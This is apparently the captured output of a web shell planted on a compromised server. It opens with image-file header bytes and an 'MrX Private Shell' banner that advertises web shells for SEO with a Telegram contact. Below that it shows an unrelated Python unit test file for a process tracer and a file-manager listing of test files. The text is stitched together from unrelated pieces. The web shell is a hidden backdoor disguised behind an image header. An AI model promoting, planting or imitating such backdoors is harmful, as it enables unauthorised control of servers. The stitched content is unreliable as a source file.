����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
from .__meta__ import *
from tracer.resources.processes import Processes, Process, ProcessWrapper
from tracer.resources.SystemdDbus import SystemdDbus
from tracer.resources.collections import ProcessesCollection
import os
import subprocess
class TestProcesses(unittest.TestCase):
@unittest.skipIf(True, "@TODO Create Mock for Processes class")
def test_children(self):
process = Processes.all()[0]
children = process.children()
self.assertIsInstance(children, ProcessesCollection)
for child in children:
self.assertIsInstance(child, Process)
@unittest.skipIf(True, "@TODO Create Mock for Processes class")
def test_unique_process(self):
process = Process(os.getpid())
parent = Process(os.getppid())
self.assertIs(process, Process(os.getpid()))
self.assertIs(parent, process.parent())
self.assertIn(process, parent.children())
Process.reset_cache()
process2 = Process(os.getpid())
self.assertEqual(process, process2)
self.assertIsNot(process, process2)
@unittest.skipIf(True, "@TODO Create Mock for Processes class")
def test_process_caching(self):
process = Process(os.getpid())
# Populate the cache entry for children
process.children()
child = subprocess.Popen(os.sys.executable, stdin=subprocess.PIPE)
self.assertEqual(0, len(process.children()))
process.rebuild_cache()
self.assertEqual(1, len(process.children()))
child.terminate()
def test_name_sshd(self):
p1 = ProcessMock()
p1.data = {"name": "sshd",
"exe": "/usr/sbin/sshd",
"cmdline": ["/usr/sbin/sshd", "-D", "foo", "bar"]}
assert p1.name() == "sshd"
p2 = ProcessMock()
p2.data = {"name": "sshd",
"exe": "/usr/sbin/sshd",
"cmdline": ["some", "thing", "and", "arguments", "idk", "what"]}
assert p2.name() == "ssh-thing-session"
# I don't know what case this is in a real life but see #129 and #125
p3 = ProcessMock()
p3.data = {"name": "sshd", "exe": "/usr/sbin/sshd",
"cmdline": ["withoutparams"]}
assert p3.name() == "sshd"
@unittest.skipIf(True, "@TODO Create Mock for Processes class")
def test_dbus(self):
dbus = SystemdDbus()
pids = Processes.pids()
nonexisting = max(pids) + 999
assert dbus.has_service_property_from_pid(1, "PAMName") is False
assert dbus.has_service_property_from_pid(nonexisting, "PAMName") is False
class ProcessMock(ProcessWrapper):
def __init__(self):
self.data = {}
def _attr(self, name):
return self.data[name]
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| __pycache__ | Folder | 0755 |
|
|
| __init__.py | File | 0 B | 0644 |
|
| __meta__.py | File | 294 B | 0644 |
|
| test_FilenameCleaner.py | File | 942 B | 0644 |
|
| test_alpm.py | File | 1.29 KB | 0644 |
|
| test_applications.py | File | 3.91 KB | 0644 |
|
| test_collections.py | File | 3.16 KB | 0644 |
|
| test_dnf.py | File | 1.29 KB | 0644 |
|
| test_dpkg.py | File | 1.26 KB | 0644 |
|
| test_hooks.py | File | 1.01 KB | 0644 |
|
| test_lang.py | File | 238 B | 0644 |
|
| test_package.py | File | 371 B | 0644 |
|
| test_portage.py | File | 1.28 KB | 0644 |
|
| test_processes.py | File | 2.38 KB | 0644 |
|
| test_query.py | File | 574 B | 0644 |
|
| test_rules.py | File | 2.19 KB | 0644 |
|
| test_tracer.py | File | 3.4 KB | 0644 |
|
| test_views.py | File | 9.81 KB | 0644 |
|
| test_yum.py | File | 1.26 KB | 0644 |
|